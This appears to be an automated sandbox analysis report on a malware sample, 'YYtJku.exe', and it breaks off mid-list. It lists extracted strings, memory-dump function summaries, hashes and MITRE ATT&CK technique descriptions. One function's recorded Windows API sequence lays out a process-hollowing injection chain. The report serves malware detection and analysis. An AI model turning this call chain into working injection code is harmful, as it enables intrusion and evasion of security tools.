w64P, xrefs: 054C0FE1
User, xrefs: 054C0C65
EndP, xrefs: 054C11A0
eryI, xrefs: 054C0328
ntin, xrefs: 054C0D25
NtGe, xrefs: 054C0A3B
NtWr, xrefs: 054C0C1F
oces, xrefs: 054C0D84
oces, xrefs: 054C08F0
W, xrefs: 054C01FB
alMe, xrefs: 054C0985
urce, xrefs: 054C01F1
NtMa, xrefs: 054C0A72
tTra, xrefs: 054C0EDD
aint, xrefs: 054C11AA
teVi, xrefs: 054C02CF
eate, xrefs: 054C0CF7
indo, xrefs: 054C1155
a, xrefs: 054C06EC
mete, xrefs: 054C0E15
emor, xrefs: 054C091D
wnDl, xrefs: 054C0530
32.d, xrefs: 054C127A
ser3, xrefs: 054C0580
just, xrefs: 054C0DB1
strlenuser32.dlladvapi32.dll, xrefs: 054C1348, 054C134B
oces, xrefs: 054C0350
NtCo, xrefs: 054C0D1B
NtQu, xrefs: 054C0B4D
GetM, xrefs: 054C0B16
wcsc, xrefs: 054C104A
File, xrefs: 054C0C0F
eUse, xrefs: 054C0D52
LdrG, xrefs: 054C0F3C
adFi, xrefs: 054C0B98
extW, xrefs: 054C0696
le, xrefs: 054C0B7F
eate, xrefs: 054C0E70
dll, xrefs: 054C0558
Crea, xrefs: 054C10F6
NtQu, xrefs: 054C031E
NtSe, xrefs: 054C0A04
NtAl, xrefs: 054C02BB
nfor, xrefs: 054C0B61
eate, xrefs: 054C0AB3
otec, xrefs: 054C0881
tCur, xrefs: 054C0C51
RtlZ, xrefs: 054C0909
ecti, xrefs: 054C10BA

Memory Dump Source

Source File: 0000000C.00000002.308708514.00000000054C0000.00000040.00000001.sdmp, Offset: 054C0000, based on PE: false

Similarity

API ID: Section$OpenView
String ID: .dll$.dll$.dll$2.dl$2.dl$2.dl$2.dl$32.d$Begi$Clas$CoCr$CoIn$Cont$Cont$Crea$Crea$Crea$Cryp$Cryp$Cryp$Cryp$Cryp$Cryp$Cryp$Cryp$DefW$EndP$Ex$ExW$Expa$File$Fill$Find$Free$GetM$GetP$GetS$Hash$Inst$IsWo$KERNEL32.DLL$Key$Key$KeyP$LdrG$LdrL$Libr$Load$Load$Lock$Memo$Mess$Mess$Muta$NtAd$NtAl$NtCl$NtCo$NtCr$NtCr$NtCr$NtCr$NtCr$NtDe$NtEn$NtFr$NtGe$NtMa$NtOp$NtOp$NtOp$NtOp$NtOp$NtOp$NtPr$NtQu$NtQu$NtQu$NtQu$NtQu$NtRe$NtRe$NtRe$NtSe$NtSe$NtTe$NtWr$NtWr$Ole3$Para$Post$Priv$Proc$Quit$Rect$Regi$Reso$Reso$Reso$Reso$RtlC$RtlC$RtlC$RtlF$RtlS$RtlZ$Sect$Show$Size$Thre$Thre$Thre$Thre$Tran$User$User$W$W$Wind$ZwCr$ZwRo$ZwUn$\Kno$\Kno$\Kno$\Kno$\Kno$\Kno$\Kno$\Kno$\Kno$\Kno$\Ole$\adv$\ker$\ntd$\use$a$ad$ad$ad$adEx$adFi$adVi$age$ageB$aint$alMe$alue$ance$ansa$api3$aryA$ash$at$ateH$ateK$ateP$ath$cW$ce$cess$cess$ckTr$ctio$ctio$ddre$ddre$dll$dll$dll$dvap$eA$eFil$eNam$ePro$eUse$eUse$ead$ease$eate$eate$eate$eate$eate$eate$eate$ecti$ecti$eeVi$emor$en$en$enFi$enKe$enMu$enPr$enPr$enSe$erne$eroM$eryI$eryI$eryS$eryS$eryV$esTo$ess$et$etCu$etPr$ext$extW$ey$ey$fSec$hDat$i32.$iewO$ile$ileg$indo$ings$ion$ion$irtu$iteF$iteV$itia$iveK$just$ken$kernel32.dll$l$l$l$l$l32.$lMem$lMem$lMem$layE$le$le$le$le32$lenW$lize$ll$ll$ll$ll.d$llba$loca$ls32$ls32$ls32$ls32$ls32$ls\O$ls\a$ls\k$ls\n$ls\u$lstr$mInf$mInf$mapV$mati$mati$mbstowcs$memc$mems$mete$mory$mp$n$n$nPai$ndEn$ndow$nel3$nfor$nfor$nmen$nsac$nt$nt$ntin$o$oadD$oced$oces$oces$oces$oces$odul$ofRe$ombs$on$on$onFi$onPr$orma$orma$ory$ory$ory$ose$otec$ow$oxA$pVie$py$py$r32.$rPro$rThr$reat$reat$reat$rent$rmin$rocA$roce$roce$rren$rs$rtua$rtua$rtua$ry$rypt$s$s$sTok$sW$sW$sact$ser3$sour$ss$ss$ss$ss$ster$strlenuser32.dlladvapi32.dll$sume$tAcq$tCon$tCon$tCre$tCur$tDec$tDer$tDes$tDes$tHas$tRel$tStr$tTra$tVal$tVir$tant$tdll$teMu$tePr$teVi$teWi$texW$text$text$tion$tion$tion$tion$troy$troy$tual$ue$ueKe$uire$umer$urce$urce$urce$urce$ureA$viro$w64P$wOfS$wPro$wcsc$wcsc$wcsc$wcsl$wcst$wnDl$wnDl$wnDl$wnDl$wnDl$wnDl$wnDl$wnDl$wnDl$wnDl$xecu$y$y$y$yste$yste
API String ID: 2380476227-789266925
Opcode ID: c194c161092c18b131e039ca3b66cc3a3cccb98f9a19bdd52842cff60dc8cd3f
Instruction ID: ea7055ab58ce0a08ba9424ee1251d6bd95965a73c328af2b09d05bd048999c62
Opcode Fuzzy Hash: c194c161092c18b131e039ca3b66cc3a3cccb98f9a19bdd52842cff60dc8cd3f
Instruction Fuzzy Hash: CAD2C0B1C0526C8ACF61DFA29D89BCEBBB8BF55304F1181DAD148AB215DB318B84CF55

Uniqueness

Uniqueness Score: -1.00%

Function 054C1C09, Relevance: 15.2, APIs: 10, Instructions: 225nativethreadprocessCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,0800000C,00000000,00000000,?,?), ref: 054C1CB7
NtQueryInformationProcess.NTDLL(?,00000000,?,00000018,00000000), ref: 054C1CDC
NtReadVirtualMemory.NTDLL(?,?,?,00000004,00000000), ref: 054C1CF6
NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000), ref: 054C1D41
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 054C1D66
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 054C1DA9
NtWriteVirtualMemory.NTDLL(?,?,?,00000004,?), ref: 054C1E36
NtGetContextThread.NTDLL(?,?), ref: 054C1E50
NtSetContextThread.NTDLL(?,00010007), ref: 054C1E74
NtResumeThread.NTDLL(?,00000000), ref: 054C1E86

Memory Dump Source

Source File: 0000000C.00000002.308708514.00000000054C0000.00000040.00000001.sdmp, Offset: 054C0000, based on PE: false

Similarity

API ID: SectionThread$ContextCreateMemoryProcessViewVirtual$InformationQueryReadResumeWrite
String ID:
API String ID: 3307612235-0
Opcode ID: 96ae76fc365d5c28d7c28a07cf9a8eaef0a1b5bf8692d1917c9822d9dabbaf16
Instruction ID: d8250a01285a2f4501970d310f7e9a3dff790f9d29eec2ad2e5ffdcad88141d3
Opcode Fuzzy Hash: 96ae76fc365d5c28d7c28a07cf9a8eaef0a1b5bf8692d1917c9822d9dabbaf16
Instruction Fuzzy Hash: 9491E375900248ABDF61DFA5CC88EEFBBB8FF89705F004059FA09EA151D731AA55CB60

Uniqueness

Uniqueness Score: -1.00%

Function 054C00AD, Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 92nativeCOMMON

Download Yara Rule

APIs

NtOpenSection.NTDLL(?,0000000C,?), ref: 054C0199
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,?,00000001,00000000,00000002), ref: 054C01B8

Strings

en, xrefs: 054C0150
NtMapViewOfSectionNtOpenSection, xrefs: 054C0128, 054C012B
wcsl, xrefs: 054C0149
@, xrefs: 054C018C
NtOpenSection, xrefs: 054C011D, 054C0120

Memory Dump Source

Source File: 0000000C.00000002.308708514.00000000054C0000.00000040.00000001.sdmp, Offset: 054C0000, based on PE: false

Similarity

API ID: Section$OpenView
String ID: @$NtMapViewOfSectionNtOpenSection$NtOpenSection$en$wcsl
API String ID: 2380476227-2634024955
Opcode ID: ca8d08bbda82312d277e41b8cb719b15daffc38e68cad09b1ab1bebb54b543c8
Instruction ID: 7cfd808d577f65fc35e7f4deb6e043b2c5563150af66b6f626194eb21d247539
Opcode Fuzzy Hash: ca8d08bbda82312d277e41b8cb719b15daffc38e68cad09b1ab1bebb54b543c8
Instruction Fuzzy Hash: 083134B5E00258EFCB10CFE5D885ADEBBB8FF48754F20415AE514EB250EB759A05CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 01519290, Relevance: 1.5, APIs: 1, Instructions: 231memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00003000,?), ref: 01519508

Memory Dump Source

Source File: 0000000C.00000002.304953051.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: false

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 97c733381b3a8ec02d64117d6275bea18768368e80a205bd3fc462bbf3925377
Instruction ID: 882ef774c12c4bd137c7d7d97bc12a8ab0a128aece559f136e32318bb3583e51
Opcode Fuzzy Hash: 97c733381b3a8ec02d64117d6275bea18768368e80a205bd3fc462bbf3925377
Instruction Fuzzy Hash: CB711231A002058FDB11EBB8C494BAEBBE5FF88318F148969D519DB395DB34DC05CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 015177D4, Relevance: 1.3, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00003000,?), ref: 01519508

Memory Dump Source

Source File: 0000000C.00000002.304953051.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: false

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 558c22defd819b44481c45c7c3db1b286784df66427f313aa6509ca4dbc3bbf2
Instruction ID: 37adb80755be0be443169dc58959534860746c7d5c5ad0ac568d7e584b270f5b
Opcode Fuzzy Hash: 558c22defd819b44481c45c7c3db1b286784df66427f313aa6509ca4dbc3bbf2
Instruction Fuzzy Hash: A01134B19006089FCB20DF9AD884BDEFBF4FF48324F158819E559A7200D775A944CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 0145D0EC, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.304852012.000000000145D000.00000040.00000001.sdmp, Offset: 0145D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 735755852c7be38c4eb7503fd47ddf0b6815ca7b7a803d5fb77d75544e540ded
Instruction ID: aef69ccd515ae4766c664da77827a0bccc783cfd021f4a71c43b83ca672021e9
Opcode Fuzzy Hash: 735755852c7be38c4eb7503fd47ddf0b6815ca7b7a803d5fb77d75544e540ded
Instruction Fuzzy Hash: CF21CFB5904200AFDB41DF94D8C0B26BB65EF84214F24C9AAE80A4B367C736D846CAA1

Uniqueness

Uniqueness Score: -1.00%

Function 0145D0E7, Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.304852012.000000000145D000.00000040.00000001.sdmp, Offset: 0145D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a50eb1ea87dfee72d6b871baeb290936708f59e98a32fcf65e78a96e58bb0a8
Instruction ID: b95e19e84708f4cb1de554f6ace15938b29e546e0f3e810ca3673a1a36ea17f8
Opcode Fuzzy Hash: 7a50eb1ea87dfee72d6b871baeb290936708f59e98a32fcf65e78a96e58bb0a8
Instruction Fuzzy Hash: F4118B75904280DFDB02CF54D9C4B16BBA1FF84224F28C6AADC494B767C33AD44ACBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0144D041, Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.304825141.000000000144D000.00000040.00000001.sdmp, Offset: 0144D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 53999c1780b02dd85b008a2b8e16b6307a3342b32503c8b619608983f4065db4
Instruction ID: 385e424b3fc0c6cfe5783e00cb40f32b46ae03543631d118111a0a8ec481fe7f
Opcode Fuzzy Hash: 53999c1780b02dd85b008a2b8e16b6307a3342b32503c8b619608983f4065db4
Instruction Fuzzy Hash: 5B01D4B19086409BF7205AAAC880B67BBD8EF502A8F08815BEE045B257D3759846C6B2

Uniqueness

Uniqueness Score: -1.00%

Function 0144D040, Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.304825141.000000000144D000.00000040.00000001.sdmp, Offset: 0144D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 32813608418871477fb66a99e785fc9d12165d817f66ae5ea35e280a8edf1a9b
Instruction ID: 1e1544f07bc9560563343da1e0269c2e5f87e8974621c068155ac62fbc059e67
Opcode Fuzzy Hash: 32813608418871477fb66a99e785fc9d12165d817f66ae5ea35e280a8edf1a9b
Instruction Fuzzy Hash: E0F0AFB14046449FE7118A5AD9C4B63FF98EB51368F18815AED084B387C3799844CAA1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: YYtJku.exe PID: 6124 Parent PID: 5004 YYtJku.exeCOMMON

Executed Functions

Function 02E7691F, Relevance: 6.1, APIs: 4, Instructions: 134threadCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 02E769A0
GetCurrentThread.KERNEL32 ref: 02E769DD
GetCurrentProcess.KERNEL32 ref: 02E76A1A
GetCurrentThreadId.KERNEL32 ref: 02E76A73

Memory Dump Source

Source File: 0000000D.00000002.474358510.0000000002E70000.00000040.00000001.sdmp, Offset: 02E70000, based on PE: false

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 16c3232fa1586b000b9802055cecf0e1364e7e9b1116ad13a0a6489f6c8f686a
Instruction ID: ff74c2846eddf5ebea90d02a896d078d47465e151fdb4752212e4366bcdfa20c
Opcode Fuzzy Hash: 16c3232fa1586b000b9802055cecf0e1364e7e9b1116ad13a0a6489f6c8f686a
Instruction Fuzzy Hash: F75177B09006498FDB14CFA9D989BDEBFF5EF88318F24C49AE009A7350DB345884CB61

Uniqueness

Uniqueness Score: -1.00%

Function 02E76940, Relevance: 6.1, APIs: 4, Instructions: 120threadCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 02E769A0
GetCurrentThread.KERNEL32 ref: 02E769DD
GetCurrentProcess.KERNEL32 ref: 02E76A1A
GetCurrentThreadId.KERNEL32 ref: 02E76A73

Memory Dump Source

Source File: 0000000D.00000002.474358510.0000000002E70000.00000040.00000001.sdmp, Offset: 02E70000, based on PE: false

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 7bed64692ab92a6c2c5ef87cf5b42460d22b068f7f033ae94ee439f12f15745f
Instruction ID: 0f60791beea864d9440e481c9ad17ee22d96fe853c8182682704f9aa97bd9019
Opcode Fuzzy Hash: 7bed64692ab92a6c2c5ef87cf5b42460d22b068f7f033ae94ee439f12f15745f
Instruction Fuzzy Hash: B25145B09006498FDB14CFAADA48BDEBBF5EF88318F24C45AE409A7350DB345884CF65

Uniqueness

Uniqueness Score: -1.00%

Function 02E75084, Relevance: 1.6, APIs: 1, Instructions: 115COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 02E751A2

Memory Dump Source

Source File: 0000000D.00000002.474358510.0000000002E70000.00000040.00000001.sdmp, Offset: 02E70000, based on PE: false

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: e35935c65c5d42be8fc691d670ffae0004aac3afac6ad25ab3fc260472c3db99
Instruction ID: 8d535a6a9ff6c4d7f247b7ce05246504d71d5e865755f6b76ec73f7cc48f7de0
Opcode Fuzzy Hash: e35935c65c5d42be8fc691d670ffae0004aac3afac6ad25ab3fc260472c3db99
Instruction Fuzzy Hash: 3551D0B1D007099FDF14CF99C884ADEFBB5BF48314F65852AE819AB210D7749845CF90

Uniqueness

Uniqueness Score: -1.00%

Function 02E75090, Relevance: 1.6, APIs: 1, Instructions: 113COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 02E751A2

Memory Dump Source

Source File: 0000000D.00000002.474358510.0000000002E70000.00000040.00000001.sdmp, Offset: 02E70000, based on PE: false

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: e4fe167d1fb19fa229aecfc8d55afa382977a1aad74b8be29573e04e40921c39
Instruction ID: 0f135df2208f56b20408a7a7001520cb89206dae434cfcea4e445ede6c77600c
Opcode Fuzzy Hash: e4fe167d1fb19fa229aecfc8d55afa382977a1aad74b8be29573e04e40921c39
Instruction Fuzzy Hash: B341BFB1D103499FDF14CF99D884ADEBBB5FF88314F64812AE819AB210D774A945CF90

Uniqueness

Uniqueness Score: -1.00%

Function 02E7779C, Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 02E77F09

Memory Dump Source

Source File: 0000000D.00000002.474358510.0000000002E70000.00000040.00000001.sdmp, Offset: 02E70000, based on PE: false

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: 275619c39488de5575f7d05f3c5235b85f81dd4166288c90bf196f526bd902aa
Instruction ID: 3ee8c2591067cd1a8af193bba064a9a46808f135837fb568f6a061d74d2d1cf1
Opcode Fuzzy Hash: 275619c39488de5575f7d05f3c5235b85f81dd4166288c90bf196f526bd902aa
Instruction Fuzzy Hash: 74410BB5A002059FDB14CF99C488AAAFBF5FF88314F25C499E519AB321D774A941CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 02E7C189, Relevance: 1.6, APIs: 1, Instructions: 78COMMON

Download Yara Rule

APIs

RtlEncodePointer.NTDLL(00000000), ref: 02E7C212

Memory Dump Source

Source File: 0000000D.00000002.474358510.0000000002E70000.00000040.00000001.sdmp, Offset: 02E70000, based on PE: false

Similarity

API ID: EncodePointer
String ID:
API String ID: 2118026453-0
Opcode ID: 86f79defac2123215fbd9a278ff116ef1a6882d44c00fd3369b0bf648720a2f8
Instruction ID: 23079bfe5a935dd6fbda94cc8cfe85d31d6cbcea177901c8f6c897f992926934
Opcode Fuzzy Hash: 86f79defac2123215fbd9a278ff116ef1a6882d44c00fd3369b0bf648720a2f8
Instruction Fuzzy Hash: 8531F1B18487898FDB10EFA8E9487DE7FF4EB45328F14845AE448A7342C7799804CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 02E76B62, Relevance: 1.6, APIs: 1, Instructions: 64COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02E76BEF

Memory Dump Source

Source File: 0000000D.00000002.474358510.0000000002E70000.00000040.00000001.sdmp, Offset: 02E70000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 3a544a1cbdfd248dc6b4291ab9df4e9610fba457d1463d63578c1453429fa0e0
Instruction ID: 40f55dc6b55405effc37224428d0c21a4272c7d40bdec9cba0988731d2d4f308
Opcode Fuzzy Hash: 3a544a1cbdfd248dc6b4291ab9df4e9610fba457d1463d63578c1453429fa0e0
Instruction Fuzzy Hash: 6521E4B5D00209AFDB10CFA9D984ADEFBF8FB48324F14845AE915A3310D374A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 02E76B68, Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02E76BEF

Memory Dump Source

Source File: 0000000D.00000002.474358510.0000000002E70000.00000040.00000001.sdmp, Offset: 02E70000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 8dd7e25bb75a83e28630c0f2943bffed8a6271486a3a85434cd6a2ccbf433fcc
Instruction ID: 23203d5c10aa186b289b94523cb2a3df031d00579acec404e323d890dbc3abb5
Opcode Fuzzy Hash: 8dd7e25bb75a83e28630c0f2943bffed8a6271486a3a85434cd6a2ccbf433fcc
Instruction Fuzzy Hash: 6221D5B5D00249AFDB10CFA9D984ADEFBF8FB48324F14845AE915A3310D374A954CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 02E7C198, Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

RtlEncodePointer.NTDLL(00000000), ref: 02E7C212

Memory Dump Source

Source File: 0000000D.00000002.474358510.0000000002E70000.00000040.00000001.sdmp, Offset: 02E70000, based on PE: false

Similarity

API ID: EncodePointer
String ID:
API String ID: 2118026453-0
Opcode ID: 40ea32840d4c38c0de2ea1a7dbcfe97bfb2732b6d3edf2e6e67884fc6e3900eb
Instruction ID: 9ac2368649bc48d2a2cf6f0c77484309456c7a1cba429ce14714b672bf0f5fc3
Opcode Fuzzy Hash: 40ea32840d4c38c0de2ea1a7dbcfe97bfb2732b6d3edf2e6e67884fc6e3900eb
Instruction Fuzzy Hash: 51117CB190434A8FDB20DFA9D5487DEBBF8FB48328F24946AD409A7600D7396944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0127D450, Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.473304674.000000000127D000.00000040.00000001.sdmp, Offset: 0127D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 96217661fbd68199f244cb1e67fd77db28ebb0ce06ace614c87018d5ac293e64
Instruction ID: 9d72a115b3f2bb92776827af44a505f49ab6cc0914b3b255046973fab692a4e0
Opcode Fuzzy Hash: 96217661fbd68199f244cb1e67fd77db28ebb0ce06ace614c87018d5ac293e64
Instruction Fuzzy Hash: 602103B1514249EFDB11DF94E9C0B67BF65FF88324F2485A9EA054B207C336E846CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0127D53C, Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.473304674.000000000127D000.00000040.00000001.sdmp, Offset: 0127D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86da0a682517f28c83267ebb8b79c082e31a2396cedd14c47b3536ccac9402f8
Instruction ID: fd1b3d3d363582fb2e84c47ee8f894fbd13028a08bd09a034c1aaefc6e924001
Opcode Fuzzy Hash: 86da0a682517f28c83267ebb8b79c082e31a2396cedd14c47b3536ccac9402f8
Instruction Fuzzy Hash: 812103B1514249DFDB01DF94E9C0B27BF66FF84328F2485A9E9094F246C336D856CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0128D01C, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.473463786.000000000128D000.00000040.00000001.sdmp, Offset: 0128D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 87c77d286b401b1f5793c3176b0b6088659bd906af26fdcc8ce4049c6baaa204
Instruction ID: 4239ca7665805cb6417457b5c49b5755147b7d8f8b3b65a9409899024c9429e4
Opcode Fuzzy Hash: 87c77d286b401b1f5793c3176b0b6088659bd906af26fdcc8ce4049c6baaa204
Instruction Fuzzy Hash: 92212575518208DFDB15EF94D8C0B16BB65FB84354F24C9A9E9094B2C6C377D80BCA61

Uniqueness

Uniqueness Score: -1.00%

Function 0127D44B, Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.473304674.000000000127D000.00000040.00000001.sdmp, Offset: 0127D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 184b28d4c02099fc0a852538407da5dc7e76361d293f30cbc9c792e0a6473fb9
Instruction ID: cca25a1fe69a571c530001e0fdf2205e078ee5ad08acb4718c9cac68e3970e86
Opcode Fuzzy Hash: 184b28d4c02099fc0a852538407da5dc7e76361d293f30cbc9c792e0a6473fb9
Instruction Fuzzy Hash: 3311ACB6404284DFDB12CF54E9C4B17BF71FB84324F2886A9D9090B617C33AD45ACBA2

Uniqueness

Uniqueness Score: -1.00%

Function 0127D537, Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.473304674.000000000127D000.00000040.00000001.sdmp, Offset: 0127D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 184b28d4c02099fc0a852538407da5dc7e76361d293f30cbc9c792e0a6473fb9
Instruction ID: 38b3c1ba9ade6983b49da7bd6b7e2b6cd067e873332f737408e60bd01f9d6c16
Opcode Fuzzy Hash: 184b28d4c02099fc0a852538407da5dc7e76361d293f30cbc9c792e0a6473fb9
Instruction Fuzzy Hash: 6411B176404285CFCB02CF54E9C4B16BF72FF84324F2486A9D9094B617C336D45ACBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0128D017, Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.473463786.000000000128D000.00000040.00000001.sdmp, Offset: 0128D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a50eb1ea87dfee72d6b871baeb290936708f59e98a32fcf65e78a96e58bb0a8
Instruction ID: 87b4240bb41b555008524583c0c773239c36b9f2d03d290c55fc2ef152affec8
Opcode Fuzzy Hash: 7a50eb1ea87dfee72d6b871baeb290936708f59e98a32fcf65e78a96e58bb0a8
Instruction Fuzzy Hash: 4511EB75404284CFDB02CF58D5C0B15FBA1FB84324F28C6AAD9094B696C33BD40BCBA2

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
